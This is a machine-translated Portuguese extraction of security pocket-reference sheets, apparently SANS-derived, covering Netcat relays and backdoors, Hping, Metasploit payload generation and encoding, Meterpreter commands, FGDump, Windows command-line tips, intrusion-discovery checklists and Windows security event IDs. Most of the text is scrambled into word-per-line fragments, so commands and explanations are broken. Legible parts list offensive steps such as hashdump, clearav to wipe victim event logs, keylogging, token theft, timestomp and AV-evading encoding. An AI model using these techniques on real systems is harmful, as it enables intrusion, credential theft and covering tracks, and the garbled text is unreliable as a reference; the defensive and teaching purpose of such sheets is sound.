Cliente Ouvinte

Sinalizadores

a depois
ouvinte
versão
o que pacotes
e
STDIN
conectando
enviados) sem
pacote
um
o
após
útil)
carga Erro
como em

o -L:
é
-l: a
é
do
máquinas
às
STDOUT I/ fechamento
-z: a
do Erro
$

e
endereço
o
simplesmente
é
[TargetIPaddr]
O

Relés

arquivos .bat:
crie
c:
Para >
\>
C: –
C:
Retransmissão Crie[LocalPort]
a [TargetIPaddr]
Revezamento
–
\>
C: –
\>
C: Crieconexão
em Retransmissão
> relé.bat
C: –
\>
C: Crie
um [NextHopIAddr]
[porta]
a

46 54
Machine Translated by Google

Relés

Paratubo
$
de p – [TargetIPaddr]
|T
Retransmissão Crie[LocalPort]
a [TargetIPaddr] | nc
–
Revezamento
– Crieconexão
em |
nc
Retransmissão |T
[porta2] Crie
um [porta]
a [NextHopIAddr]
$

Conchas
Capturador

|– [porta_de_início]-
(- [end_port]
para
1
e
(-
[start_port] a banner Adicione
string – faixa o – – Reverter um [SeuendereçoIP]
$

Pegue
o Endereço em
recebido Escutando
o C:
Escutando
– Crie Backdoor –
C: Crie
$

um
$

–
Adicione

Transferência

Scanner

o
Envie– Ouça – [arquivo]EmpurrePuxe
o – Ouça – [arquivo recuperar
Conecte-
e
a – [porta_de_início]-
Escanear (- [end_port]
IP [TargetIPaddr]
-1
v
(-
executando (-
segundo escolha
55
$

a
conectar
Tentar (-
A
$

47
Machine Translated by Google

Português
REFERÊNCIA
Por

BOLSO
Ferramentas

GUIA
Folha

DE
Propósito

Ferramentas

O
é
objetivo
variedade
e e
ferramentas

Metasploit
e
é
Metasploit
O Medidor
é Estrutura
que
Meterpreter
O Fgdump
é
FGDump
hashes Hping
é
Hping
um

Hping

[Porta]:
+ +
[Porta]: o
o [Porta]:

Enviar –- x escolhido
e
1
cada
para
Enviar -- scan
-- a
chave
palavra- Padrão:
a incrementando
cada
para
--
pacote pacotes
#

Alvo
Seleção #
múltiplos
Alvos Porta
Seleção Várias/ Seleção

Hping

56
Uso: [Opções]Opções:
Enviar a
count
-- -- carga--
-- data
a
Comprimento
[N]: pacotes
Dez
fast:
-- em
Intervalo Modo
Modos:
rawip:
--
TCP
padrão: --
spoof
Seleção
#

Opções

48
 carga
destino.
de
máquina
na
executados
ser
podem
post
módulos
os
disponível,
Meterpreter
do
sessão
uma
Com payloads.
de
lista
uma
fornece
só
si
por
Rodar
autônomos.
arquivos
gerar
para
usada
ser
pode
msfpayload
ferramenta
A

Módulos
$
como
Meterpreter)
(como
Metasploit
do
úteis
Cargas
e
Por
Folha
Yori
Machine Translated by Google

BOLSO
REFERÊNCIA
DE
GUIA
>
meterpreter
Metasploit

Módulos
msfpayload
Português

>
em
uma
Postar
sessão
módulos
arquivo:
para
redirecionado
e
executável
um
como
Meterpreter
do
útil
carga
a
Reverter

LHOST=[LocalHost
Exemplo
alguns
para
comuns
opções
algumas
descrever
é
dicas
de
folha
desta
objetivo
O
Propósito

LPORT=[PortaLocal]
$

>
do
componentes
vários
dos
Framework
Metasploit

windows/

Módulos
msfpayload
>
msf

Scanner
TiposS

>
–
P –
– X

auxiliar/
exploits.
segurança
ferramentas
usar
e
desenvolver
para
desenvolvimento
de
plataforma
uma
é
Framework
Metasploit
O

scanner/
e
Ferramentas

portscan/
–
R
>
msf

–
C

>
Metasploit

usar
Enumeração
$
msfencode.
codificadores
de
lista alvo.
máquina
uma
em
explorado
processo
um
sobre
controle
fornece
que
Framework

auxiliar/
-t
com
l'fornece
'-
com
Executar
antivírus.
desvio
codificação
de
nível
um
aplicar
para
usada
ser
pode
msfencode
ferramenta
A qualquer
carregada
DLL
como
rodando
Metasploit,
destino
de
sistema
do
dentro
útil
carga
uma
é
Meterpreter
O

Payloads
>
msf

Codificando

Servidor
>
Metasploit
Meterpreter

usar
auxiliar/
bruto.
shellcode
e
Perl
script
executável,
incluindo
formatos,
variedade
em
gerados
ser
podem
payloads
Os
framework.
dentro
payload
qualquer
de
Metasploit
do
autônoma
versão
da
componente
um
é
msfpayload
ferramenta
A
uma
gerar
usuário
ao
permite
que
Framework

[Tipo
>
msf

Servidor
$
usando
vezes
5
msfpayload
de
útil
carga
uma
Codifique

usar
|5
Metasploit

[...]
msfpayload

rota.
especificada
sessão
pela
roteado
será
rota
uma
de
rede
sub-
à
corresponda
que
proxy
tráfego
Qualquer

Exemplo
executável:
como
saída
e
nai
ga-
shikata-
codificador

Meterpreter.
do
sessão
uma
meio
por
aplicativos
de
tráfego
qualquer
rotear
socks4
para
configurados
proxychains
Use msfpayload

49
57
Machine Translated by Google

FGDespejo

[EndereçoIP – [Nome
– – [Nome
-c
C:

C:

C:

C:
Uso: Exemplos:
\>

\>

\>

\>
– – Despejar
com Opções:
e
de
despejo
Ignorar
-c: -v:
hosts
pular o
Despejar Despejar
–
de Despejar
usuário: Despejar

Metasploit

use hashdump:
timestomp:
processo Exemplo:
Comandos
o executando
o
dentro
getpid: executando
kill: Quando
com dentro o
do Comandos
ipconfig:
a route: Comandos
Gerenciar/ a
Exibe
idletime:
em
duração o
[teclado/ Módulos
use
-

Medidor

Console
msf

Pesquisar
por Especifique
um Especifique
um Mostrar
>
opções Definir
opções: >
Iniciar Comandos
?/
um
Exibe
help: Comandos
Alterar
cd: ls:
Mostrar
de
conteúdo
um
diretório
a
cat:
58
>

50
 >
msf
módulo:
por
Pesquisar

Noções
Metasploit
processos
de
lista
a
Exibe
é
Meterpreter
que
usuário
do
ID
o

search
Gerenciando

ps:
dentro
para
correndo plano:
segundo
em
colocada
imediatamente
seja
que
sessão
única
uma
esperando
exploit
o
Execute

Comandos
Machine Translated by Google

Exploração

getuid:
>
msf
usar:
para
explore
e
Especifique

use
é
Meterpreter
que
do
ID
o
Exibe
em
bloqueio
um
tem
processo
com
executando >
msf

-z
>
msf
usado:
ser
a
Payload
um
Especifique de
ID
seu
dado
processo
um
Encerra plano:
colocadas
imediatamente
serão
que
sessões
mais
ou
uma
esperando
plano
segundo
em
exploit
o
Execute

set
carregado
está
Meterpreter
o
que
em
processo
do
privilégios
os
com
programa
determinado
um
Executar
>
msf

j
–
>
msf
atuais:
módulos
os
para
opções
Mostrar destino
processo
de
ID
determinado
um
para
Ir

getpid: kill: executar:

menores
ou
iguais
privilégios
ter
deve
destino
-de >
msf
exploração):
de
ouvintes
(geralmente
atuais
trabalhos
os
todos
Listar
l
–

migrar:

mostrar
jobs
estável
mais
processo
um
ser
pode
-alvo
>
msf
opções:
Definir que
arquivos
quaisquer
acessar
pode
processo,
um
de
-dentro

set
>
msf
trabalho:
um
Matar
–
jobs

>
msf
exploração:
Iniciar
rede
de
interface
da
informações
Mostrar

exploit
TCP
sessão
da
através
pacotes
Encaminhar

Comandos
Sessões

sistema
do
roteamento
de
tabela
a
visualizar
Gerenciar/ plano:
segundo
em
sessões
as
todas
Listar

ipconfig:
>
msf

portfwd:
-l

rota:

Medidor
ociosa
ficou
tela
de
captura
imagem
uma
como
Salva
alvo
máquina
da
teclado
ou
mouse
do
GUI
que
duração
a
Exibe plano:
segundo
em
sessões
com
Interaja

básicos:
>
msf
-i

Comandos

Comandos ?exit
idletime:
a
SO
de
tipo
e
sistema
do
nome
o
Mostra

/
screenshot:
uictl
>
meterpreter
atual:
interativa
sessão
da
Histórico

/ sysinfo:
[habilitar/
[teclado/
<Ctrl+Z>ou

diretório
Alterar >
meterpreter

desligamento
cd:
invasor)
(do
local
máquina
na
diretório
Alterar

Comandos
atual
trabalho
de
diretório
Exibir
diretório
do
conteúdo
o
Mostra

pwdls:
/ lcd: getwd:
Módulos
use
tela
na
arquivo
um
de
conteúdo
o
Exibir Exemplo: >
msf
sessão.
desta
meio
por
pivotados
serão
destino
rede
sub-
de
máscara
a
contra
aux)
post/
(exploits/
módulos
os
Todos
Roteamento
add

destino
de
máquina
a
para
de/
arquivos
Mover
route

caixa
da
hashes
os
despeja

/ cat: upload:
altera

vi)
(normalmente
padrão
editor
no
arquivo
um
Abra
use hashdump:
[Máscara

download / editar:

51
59
Machine Translated by Google

Folha de dicas do Metasploit

Etapa 1: Comandos principais

Em seu uso mais básico, o meterpreter é um terminal Linux no computador da vítima. Como tal, muitos dos
nossos comandos básicos do Linux podem ser usados no meterpreter mesmo se ele estiver em um Windows ou
outro sistema operacional.

Aqui estão alguns dos principais comandos que podemos usar no meterpreter.

• ? - menu de ajuda •
background - move a sessão atual para o segundo plano • bgkill - mata um
script meterpreter em segundo plano • bglist - fornece uma
lista de todos os scripts em segundo plano em execução • bgrun -
executa um script como um thread em segundo plano •
channel - exibe canais ativos • close - fecha
um canal • exit - encerra uma
sessão meterpreter • help - menu de ajuda • interact
- interage com um canal •
irb - entra no modo de script Ruby • migrate -
move o processo ativo para um PID designado
• quit - encerra a sessão meterpreter • read - lê os dados de um canal •
run - executa o script meterpreter designado depois
dele • use - carrega uma extensão meterpreter •
write - grava dados em um canal

Etapa 2: Comandos do sistema de arquivos

• cat - lê e envia para stdout o conteúdo de um arquivo • cd - altera
o diretório na vítima • del - exclui um arquivo na
vítima • download - baixa um arquivo do
sistema da vítima para o sistema do invasor • edit - edita um arquivo com vim • getlwd - imprime
o diretório local • getwd - imprime o
diretório de trabalho • lcd - altera o diretório
local • lpwd - imprime o diretório local • ls -
lista os arquivos no diretório atual •
mkdir - cria um diretório no sistema
da vítima • pwd - imprime o diretório de
trabalho • rm - exclui um arquivo • rmdir - remove o diretório
no sistema da vítima • upload - carrega
um arquivo do sistema do
invasor para a vítima

Etapa 3: Comandos de rede • ipconfig

- exibe interfaces de rede com informações importantes, incluindo endereço IP, etc. • portfwd
- encaminha uma porta no sistema da vítima para um serviço remoto •
route - exibe ou modifica a tabela de roteamento da vítima

Etapa 4: Comandos do sistema

• clearav - limpa os logs de eventos no computador da vítima

60 52
Machine Translated by Google

• drop_token - descarta um token roubado •

execute - executa um comando • getpid -
obtém o ID do processo atual (PID) • getprivs - obtém o
máximo de privilégios possível • getuid - obtém o usuário
com o qual o servidor está sendo executado • kill - encerra o
processo designado pelo PID • ps - lista os processos em execução
• reboot - reinicia o computador da
vítima • reg - interage com o registro da vítima •
rev2self - chama RevertToSelf() na máquina da
vítima • shell - abre um shell de comando na máquina da vítima •
shutdown - desliga o computador da vítima • steal_token - tenta
roubar o token de um processo (PID) especificado • sysinfo -
obtém os detalhes sobre o computador da vítima, como sistema operacional e nome

Etapa 5: Comandos da interface do usuário •

enumdesktops - lista todas as áreas de trabalho acessíveis
• getdesktop - obtém a área de trabalho atual do meterpreter •
idletime - verifica há quanto tempo o sistema da vítima está ocioso • keyscan_dump -
despeja o conteúdo do keylogger de software • keyscan_start - inicia o keylogger
de software quando associado a um processo como o Word ou
navegador
• keyscan_stop - interrompe o keylogger de software •
captura de tela - captura uma captura de tela da área de trabalho do
meterpreter • set_desktop - altera a área de trabalho do
meterpreter • uictl - permite o controle de alguns dos componentes da interface do usuário

Etapa 6: Comandos de escalonamento de privilégios •

getsystem - usa 15 métodos integrados para obter privilégios de administrador de sistema

Etapa 7: Comandos de despejo de senha •

hashdump - captura os hashes no arquivo de senha (SAM)

Note que o hashdump frequentemente aciona o software AV, mas agora há dois scripts que são mais furtivos, "run hashdump" e
"run smart_hashdump". Procure mais sobre eles na minha próxima folha de dicas de script do meterpreter.

Etapa 8: Comandos Timestomp • timestomp

- manipula os atributos de modificação, acesso e criação de um arquivo

61 53
 WMIC

e
fundamental :
Gramática

Comando
\>
C: \>
C:

Chaves
Linha

Valores:

\
Adicionando
[\
Machine Translated by Google

Windows Por

máquina
na
registro
ao
chave
uma
Adicionar
Folha GUIA

Útil

cláusula]
registro
domínio
do
dentro
Português

de
será
atual
a
especificada,
for
remota
máquina
nenhuma
Se
local
o
para

processo

[Key].
serviço
assumido. patches)
mostra
–
Engineering
Fix

conta

[TargetIPaddr]
configuração
fornecer
é
dicas
de
folha
desta
objetivo
O

qfe

[RegDomain]
comece
Propósito

Windows
vários
usar
como
sobre
dicas
Exemplo

e
em
referenciados
frequentemente
são
que
comando

Exportar
Importar:
\>
C:

\
560.
e
531
517,
504,
SANS

where]:
e
onde

[Nome
e

onde
(linha
domínio
no
localizados
valores
e
subchaves
as
todas
Exportar

arquivo
para
local
o
sob momento:
no
execução
em
processos
os
todos
Listar
Exemplo \>
C:

[Key]
Informações

[Nome
parentprocessid!
\>
C:

[orações

[RegDomain]
lista
DLLs
as
e
momento
no
execução
em
processos
os
todos
Listar
carregou:
um
cada

obter
arquivo
do
registro
de
entradas
as
todas
Importar \>
C:
m

o
para
ou
de
feitas
ser
podem
só
exportação
a
e
importação
A de
atributos
os
todos
Listar

excluir
o
possuem
que
momento
no
execução
em
processos
os
todos
Lista
local.
máquina \>
C:
especificado
\>
C:
[dll] m

[atributo1,atributo2…]
de
chamáveis
métodos
os
todos
Listar

de um

Consulta
Chave:
\>
C: \>
C:
serviços
e
momento
no
execução
em
processos
os
todos
Listar

Valor específico para um

\v
[\
processos:
nesses
hospedados
\>
C:

Exemplo:
execução:
em
processos
de
atributos
os
todos
Listar

máquina
na
chave
uma
Consultar \>
C: serviços:
os
todos
de
status
breve
Consultar
registro
de
domínio
o \>
C:

[Nome dentro
sc

Adicione
chave.
essa
sob
valores.
os
todos
recursar
para
sespecífico
valor
o
obtenha
e / remoto
WMIC
efeito
o
Tornar
\>
C: específico:
serviço
um
de
configuração
a
Consultar

no [Key]
/
\>
C:
sc

[ValueName]
lista

54
62
 e
e
\>
C:
grupo):
gerenciamento
(inclui
local
usuários
de
Gerenciador
específico:
em
arquivo
um
para
diretório
de
estrutura
Pesquisar

Desligar
imediatamente:
Windows
o
Desligue

Pesquisa
Invocando
\>
C:

t0
s/
\>
C:
Machine Translated by Google

s
\b /
\>
C:
serviços:
controle
de
Painel
hardware.
desligar
não
pode
comando
o
Observação:
StandardOuy
no
linhas
de
número
o
Conte

imediatamente:
Windows
o
Reinicie
\>
C:
tarefas:
de
Gerenciador
\>
C: \>
C:

lusrmgr.mscservices.msc

|v

t0
r/
[Comando]:
regressiva:
contagem
reiniciar
desligamento/
Abortar LF
CR/
branco,
em
mesmo
linhas,
as
todas
são
têm
As
("").
nada
v)
(/
contêm
não
que
linhas
de
c)
contagem
a
Encontra
\>
C:
Segurança:
Política
de
Gerenciador
\>
C:

a
\>
C:
eventos:
de
Visualizador

processos:
IDs
UDP
e
TCP
portas
de
usos
os
todos
Mostrar

Sintaxe
\>
C:

–
Linha
controle:
de
Painel
taskmgr.exesecpol.msc eventvwr.msc

\>
C:
porta
da
uso
o
Procure \>
C:

Laço:

a
Contando
\>
C:

–
F4
Alt-
pressionando
GUI
da
janelas
as
Feche

protocolo:
do
detalhadas
estatísticas
Despejar atual.
representar
para
comando
no
lugar
qualquer
em
usada
ser
iteradora
variável
A
execute
iteração,
Para
igual
seja
valor
seu
que
até
iteração
cada
a
o
incremente-
e
de
inicial
um
Defina
a

%i
\>
C:

L ([iniciar],

–
[step]
[start]
[stop].
Windows:
do
integrado
firewall
o
Desative

\>
C:
Interagindo

[command].
Vista:
no
telnet
serviço
Instalar com
local”
área
de
“Conexão
interface
a
Configurar

Instalando
\>
C:

Iterar
\>
C: \>
C:

F
Vista:
no
telnet
cliente
o
Instalar

conteúdo: arquivo sobre

[Endereço

\>
C:
1

execute
e
em
da
o
armazene
iteração,
cada
Para
linha.
por
linha
arquivo
do
conteúdo
pelo
Itere
Vista:
no
IIS
o
Instalar

%i
[comando]
local”:
área
de
“Conexão
para
DNS
servidor
Configurar
\>
C: \>
C:
netsh [PadrãoGW]
netsh

[command]. DHCP:
usar
para
interface
Configurar

Serviço
(/
desinstalação
de
atualização
com
Atualização

da
Modelo
\>
C:
install
substitua
pacotes,
desses
um
qualquer
remover
Para
netsh

55
ConfigurationAPI
63
 intrusão
de
Descoberta

http://
a
de

Entradas
Windows:
do
eventos
de
visualizador
o
execute
logs,
os
visualizar
Para listado.
site
no
gratuito
download
disponível
está
delas
uma
Cada
detalhes.
mais
em
segurança
de
status
seu
analisar
para
usadas
ser
podem
mas
Windows,
operacional
sistema
ao
integradas
são
não
ferramentas
seguintes
As
Guia

Ferramentas
www.sans.org/
\>
C:
referência
Windows
Machine Translated by Google

Português
isc.sans.org
http://
Português:
Instituto

acessando:
eventos
de
visualizador
o
invoque
Ou

a
é
AdministrativasÿEvento
IniciarÿProgramasÿFerramentas

O
Visualizador

SANS
AVISO
LEGAL:
Propósito

como:
suspeitos,
eventos
por
Procure frente
linha
estão
geralmente
os
que
descoberta
na
sistemas
administradores
aos
suporte
dar
objetivo
como
tem
guia
Este
computadores.
segurança
de
linhas
portas:
nessas
que
programa
o
escuta
de
UDP
TCP/
portas
mapear
para
Ferramentas
interrompido.”
foi
eventos
log
de
serviço
“O
sistema.
do
comprometimento
de
indicações

neste
ativa
está
não
Windows
do
Arquivos
de
Proteção
“A
www.foundstone.com
em
comando
linha
de
ferramenta
–
Fport
sistema."
Como

Windows..."
Arquivos
Proteção
a
porque
válida
e
original
versão
sua
para
restaurado
foi
não
arquivo]
do
[nome
protegido
sistema
de
arquivo
"O
sysinternals
technet/
www.microsoft.com/
em
GUI
ferramenta
–
TCPView
sempre
ou
semanalmente
(diariamente,
Periodicamente
estes
execute
gerencia,)
você
sistema
um
em
logon
Cada
computador.
de
invasão
uma
por
causado
ser
pode
que
anômalo
comportamento
procurar
para
rápidos
passos

sistema.
um
em
localmente
executados
são
comandos
esses
--
Kit
Resource
2000
Windows
do
processos
análise
de
Ferramentas
iniciado
foi
Telnet
MS
serviço
“O
Esse
seções:

sucesso.”
com incomuns
serviços
e
•Processos
927229:
kb/
support.microsoft.com/
http://
incomuns
registro
de
chaves
•e
bloqueadas.
contas
ou
falha
com
logon
tentativas
de
número
grande
um
por
Procure
execução
em
processo
cada
a
associado
usuário
de
nome
o
mostra
–
pulist rede
da
incomum
•Uso
estes em dividir é folha

incomuns
agendadas
•Tarefas
•incomuns
etc.
memória,
Pid,
nome,
incluindo
processo,
do
detalhadas
estatísticas
mostra
–
pstat
incomuns
log
de
•Entradas
incomuns
•itens

adicionais
suporte
de
•Ferramentas

Outros
Tarefa
CPU:
a
monopolizando
incomum
processo
único
um
e
lento
anormalmente
desempenho
por
Procure www.diamondcs.com.au
http://
em
GUI
ferramenta
–
Explorer
Process

sysinternals
technet/
www.microsoft.com/
Se

desempenho
e
processo
de
ÿGuias
Gerente processos:
análise
de
adicionais
Ferramentas
em
GUI
ferramenta
--
TaskMan+ assistência.
mais
obter
e
atividades
as
relatar
para
imediatamente
Team
Handling
Incident
a
com
contato
em
Entre
ataque.
um
sofrido
ter
não
ou
pode
sistema
Seu

questão.
em
sistema
o
para
normal
nível
do
além
sistema,
no
incomuns
falhas
por
Procure

www.cisecurity.org.
em
gratuitamente
pontuação
ferramentas
e
Windows
do
segurança
de
modelos
vários
lançou
Security
Internet
for
Center
O

56
64
 e
Tarefas
executando:
local
host
no
agendadas
tarefas
as
Veja

Uso
taskmgr.exe)
digite
e
(IniciarÿExecutar…
executando
inesperados
incomuns/
processos
por
Procure definida:
comercial
finalidade
uma
tenha
um
cada
que
se
certifique-
e
arquivos
de
compartilhamentos
os
Observe
\>
C:
tarefas:
de
Gerenciador

em

Processos
Machine Translated by Google

\>
C: o
usando
agendadas
tarefas
as
verifique
disso,
Além

\
instalados:
incomuns
rede
de
serviços
por
Procure acessando:
invocado
Tarefas,
de
Gerenciador

\>
C: máquina:
a
com
aberta
sessão
uma
tem
quem
Veja IniciarÿProgramasÿAcessóriosÿSistema
agendadas
FerramentasÿTarefas

\>
C:
(GUI):
incomuns
iniciados
rede
de
serviços
por
Procure
\>
C: branco.
em
de
nome
com
ou
SISTEMA
Administrador,
grupo
no
usuário
um
como
executadas
são
que
aquelas
especialmente
incomuns,
agendadas
tarefas
por
Procure
sistemas:
outros
com
abriu
máquina
esta
sessões
quais
Veja

do
desvios
procurar
e
máquina
da
normais
processos
os
com
familiarizado
estar
precisa
Você

\>
C:
norma. usuário:
do
automática
inicialização
de
diretórios
nos
inesperadas
entradas
por
Procure

IP:
TCP/
sobre
NetBIOS
do
atividade
a
Observe e
\Documentos
C:

\Iniciar
[nome_do_usuário]
Configurações\
\>
C:

–
Menu\Programas\Inicialização

e
\Iniciar
[nome_do_usuário]
\Winnt\Profiles\
C:
incomuns:
escuta
de
UDP
e
TCP
portas
por
Procure
em
mouse
direito
botão
com
(clique
GUI
a
usando
livre,
no
repentinas
reduções
por
procurar
para
arquivo
espaço
do
uso
o
Verifique

Arquivos
Menu\Programas\Inicialização

\>
C:

–
digite:
ou
partição)
\>
C:

\
c:
segundos:
5
cada
a
comando
deste
saída
da
rolagem
e
contínua
atualização
Para

KB
10000
menos
pesquisaÿTamanhoÿPelo
Opções
pastas…
de
IniciarÿPesquisarÿPor
grandes:
anormalmente
arquivos
por
Procure
Contas

no
inesperadas
e
novas
contas
por
Procure
\>
C:

–
administradores:
de
Grupo

sistema:
do
inicialização
à
associadas
registro
de
chaves
nas
mencionados
estranhos
programas
por
Procure
proprietário:
processo
do
ID
mostrar
para
–
sinalizador
o
incluem
2003
e
XP
Windows
O \>
C:

HKLM\Software\Microsoft\Windows\

VersãoAtual\Executar Administradores,
vezes
duas
clique
Grupos,
em
Clique
\>
C:

–
HKLM\Software\Microsoft\Windows\ grupo.
deste
membros
os
verifique
então

VersãoAtual\ExecutarUmaVez
desvios.
por
procurar
e
sistema
no
porta
da
normal
uso
o
entender
precisa
você
Novamente,
comando:
de
prompt
no
feito
ser
pode
também
Isso
HKLM\Software\Microsoft\Windows\

VersãoAtual\RunonceEx
\>
C:

execute:
registro,
o
verificar
Para
\>
C:
\>
C:

57
65
 intrusão
de
Descoberta

http://
a
de

Entradas
como:
suspeitos,
eventos
de
busca
em
registros
seus
Verifique
Guia

www.sans.org/
interrompido.”
foi
eventos
log
de
serviço
“O
referência
Windows

listado.
site
no
gratuito
download
disponível
está
delas
uma
Cada
detalhes.
mais
em
segurança
de
problemas
analisar
para
usadas
ser
podem
mas
Windows,
operacional
sistema
ao
integradas
são
não
ferramentas
seguintes
As
Machine Translated by Google

Servidor

Ferramentas
neste
ativa
está
não
Windows
do
Arquivos
de
Proteção
“A
isc.sans.org
e
www.sans.org

sistema."
Instituto

Windows..."
Arquivos
Proteção
a
porque
válida
e
original
versão
sua
para
restaurado
foi
não
arquivo]
do
[nome
protegido
sistema
de
arquivo
"O

a
é
O
Propósito

SANS
frente
linha
estão
geralmente
os
que
descoberta
na
sistemas
administradores
aos
suporte
dar
objetivo
como
tem
guia
Este
computadores.
segurança
de
linhas

AVISO
LEGAL:
iniciado
foi
Telnet
MS
serviço
“O
sistema.
do
comprometimento
de
indicações
sucesso.”
com

portas:
nessas
que
programa
o
escuta
de
UDP
TCP/
portas
mapear
para
Ferramentas

bloqueadas.
contas
ou
falha
com
logon
tentativas
de
número
grande
um
por
Procure
Como

www.foundstone.com
em
comando
linha
de
ferramenta
–
Fport

Windows:
do
eventos
de
visualizador
o
execute
GUI,
a
usando
isso
fazer
Para
sempre
ou
semanalmente
(diariamente,
Periodicamente
estes
execute
gerencia,)
você
sistema
um
em
logon
Cada
computador.
de
invasão
uma
por
causado
ser
pode
que
anômalo
comportamento
procurar
para
rápidos
passos

\>
C: sysinternals
technet/
www.microsoft.com/
em
GUI
ferramenta
–
TCPView
sistema.
um
em
localmente
executados
são
comandos
esses
Esse
seções:

comando:
de
prompt
o
Usando incomuns
serviços
e
•Processos
\>
C: incomuns
registro
de
chaves
•e

|
rede
da
incomum
•Uso
estes em dividir é folha

específico:
eventos
de
log
um
em
focar
para
Ou, www.diamondcs.com.au
http://
em
GUI
ferramenta
–
Explorer
Process
incomuns
agendadas
•Tarefas
sysinternals
technet/
www.microsoft.com/
\>
C: •incomuns

L
processos:
análise
de
adicionais
Ferramentas
em
GUI
ferramenta
--
TaskMan+
incomuns
log
de
•Entradas
incomuns
•itens

adicionais
suporte
de
•Ferramentas
www.cisecurity.org.
em
gratuitamente
pontuação
ferramentas
e
Windows
do
segurança
de
modelos
vários
lançou
Security
Internet
for
Center
O

Outros
e
lento
anormalmente
desempenho
um
por
Procure

Tarefa
CPU:
a
monopolizando
incomum
processo
único
Se

desempenho
e
processo
de
ÿGuias
Gerente
assistência.
mais
obter
e
atividades
as
relatar
para
imediatamente
Team
Handling
Incident
a
com
contato
em
Entre
ataque.
um
sofrido
ter
não
ou
pode
sistema
Seu

questão.
em
sistema
o
para
normal
nível
do
além
sistema,
no
incomuns
falhas
por
Procure

58
66
 e
Tarefas
desvios.
procure
serviços
e
nos
se
concentre-
inesperados,
incomuns/
processos
por
Procure branco.
em
de
nome
com
ou
SISTEMA
Administradores,
grupo
no
usuário
um
como
executadas
são
que
aquelas
especialmente
incomuns,
agendadas
tarefas
por
Procure

Uso

Processos
normal
familiarizado
estar
precisa
Você
administradores).
grupo
no
usuários
(ou
“Administrador”
ou
“SYSTEM”
usuário
de
nome
o
com
definida:
comercial
finalidade
uma
tenha
um
cada
que
se
certifique-
e
arquivos
de
compartilhamentos
os
Observe
Machine Translated by Google

\>
C:

\
Tarefas:
de
Gerenciador
o
execute
GUI,
a
Usando Tarefas:
de
Agendador
o
execute
GUI,
a
Usando
\>
C:
máquina:
a
com
aberta
sessão
uma
tem
quem
Veja IniciarÿProgramasÿAcessóriosÿSistema
agendadas
FerramentasÿTarefas
comando:
de
prompt
o
Usando \>
C:
\>
C:

\>
C: comando:
de
prompt
o
Usando
sistemas:
outros
com
abriu
máquina
esta
sessões
quais
Veja
\>
C:
inusitados.
serviços
por
também
Procure

\>
C:
registro.
chaves
as
e
usuário
do
diretórios
os
verificar
se
lembrando-
inesperadas,
entradas
busca
em
automática
inicialização
de
itens
outros
também
Verifique
GUI:
a
Usando
\>
C: IP:
TCP/
sobre
NetBIOS
do
atividade
a
Observe

comando:
de
prompt
o
Usando \>
C:

–
\>
C:
Inicialização:
aba
observe
e
msconfig
execute
GUI,
a
Usando
\>
C: incomuns:
escuta
de
UDP
e
TCP
portas
por
Procure

sc
processo:
cada
a
associados
serviços
de
lista
uma
obter
Para \>
C: Executar,
ÿ
Iniciar

–
\>
C:

segundos:
5
cada
a
comando
deste
saída
da
rolagem
e
contínua
atualização
Para
comando:
de
prompt
o
Usando
\>
C:
\>
C:

e
–
digite:
ou
partição)
na
mouse
direito
botão
com
(clique
GUI
a
usando
livre,
no
repentinas
reduções
por
procurar
para
arquivo
espaço
do
uso
o
Verifique
proprietário:
processo
do
ID
mostra
o
–
sinalizador
O

Arquivos
\>
C:

\
c:
\>
C:

–
Contas

Administradores:
grupo
no
inesperadas
e
novas
contas
por
Procure
pastas…
de
IniciarÿPesquisarÿPor
grandes:
anormalmente
arquivos
por
Procure

KB
10000
menos
pesquisaÿTamanhoÿPelo
de
Opções rede.
de
conexão
a
para
carregadas
DLLs
as
e
executável
do
nome
o
mostra
b
–
sinalizador
O

\>
C:
sistema:
do
inicialização
à
associadas
registro
de
chaves
nas
mencionados
estranhos
programas
por
Procure

\>
C:

–
Atual\Executar
HKLM\Software\Microsoft\Windows\Versão grupo.
deste
membros
os
marque
depois
e
Administradores
vezes
duas
clique
Grupos,
em
Clique
Vez
Uma
Atual\Executar
HKLM\Software\Microsoft\Windows\Versão
usa
–
sinalizador
o
que
Observe
CPU.
da
excessivos
recursos
Atual\RunonceEx
HKLM\Software\Microsoft\Windows\Versão

desvios.
por
procurar
e
sistema
no
porta
da
normal
uso
o
entender
precisa
você
Novamente, comando:
de
prompt
no
feito
ser
pode
também
Isso
acima).
por
HKLM
(substitua
HKCU
do
contrapartes
as
verificar
deve
também
você
que
Observe

\>
C:
GUI:
a
Usando Windows:
Firewall
do
configuração
a
também
Verifique
\>
C: \>
C: \>
C:

comando:
de
prompt
o
Usando

59
\>
C:

67
Machine Translated by Google

68
Machine Translated by Google

Windows
Registro de segurança

Referência rápida

Alterações na conta do usuário

Controlador de domínio
4720 Criado
Eventos de autenticação
4722 Habilitado

4723 O usuário alterou sua própria senha

4768
Um tíquete de autenticação Kerberos (TGT) foi
4724 Usuário privilegiado alterou a senha deste usuário solicitado
4725 Desabilitado

4726 Excluído
4771 Falha na pré-
4738 Mudado autenticação do Kerberos
Veja Kerberos
4740 Bloqueado para fora
Códigos de falha
Falha na
4767 Desbloqueado 4772 solicitação de um tíquete
4781 Mudança de nome de autenticação Kerberos

Membro
Mudanças de grupo Criado Alterado Excluído
Adicionado Removido

Local 4731 4737 4734 4732 4733

Segurança Global 4727 4735 4730 4728 4729

Universal 4754 4755 4758 4756 4757

Local 4744 4745 4748 4746 4747

Distribuição Global 4749 4750 4753 4751 4752

Universal 4759 4760 4763 4761 4762

Eventos de sessão de logon Códigos de falha do Kerberos

4624 Login bem-sucedido Correlacionar por 0x6 Nome de usuário incorreto

4647 ID de logon 0x7

Logotipo iniciado pelo usuário Nova conta de computador?

4625 Falha de logon (consulte Códigos de falha de logon) 0x9 O administrador deve redefinir a senha

4778 Sessão de área de trabalho remota reconectada 0xC Restrição de estação de trabalho

4779 Sessão de área de trabalho remota desconectada Conta desabilitada, expirada, bloqueada, restrição
0x12
de horas de login
4800 Estação de trabalho bloqueada
0x17 A senha do usuário expirou
4801 Estação de trabalho desbloqueada
0x18 Senha incorreta
4802 Protetor de tela invocado
0x20 Frequentemente registrado por contas de computador
4803 Protetor de tela dispensado
0x25 O relógio da estação de trabalho está muito dessincronizado com o DC

Tipos de logon Códigos de falha de logon

2 Interativo Nome de usuário não existe
0xC0000064
3 Rede (ou seja, unidade mapeada) 0xC000006A O nome de usuário está correto, mas a senha está errada

4 Lote (ou seja, tarefa agendada) 0xC0000234 O usuário está bloqueado no momento

5 0xC0000072 A conta está desativada no momento

Serviço (inicialização do serviço)
O usuário tentou fazer logon fora das
Desbloquear (ou seja, estação de trabalho autônoma 0xC000006F
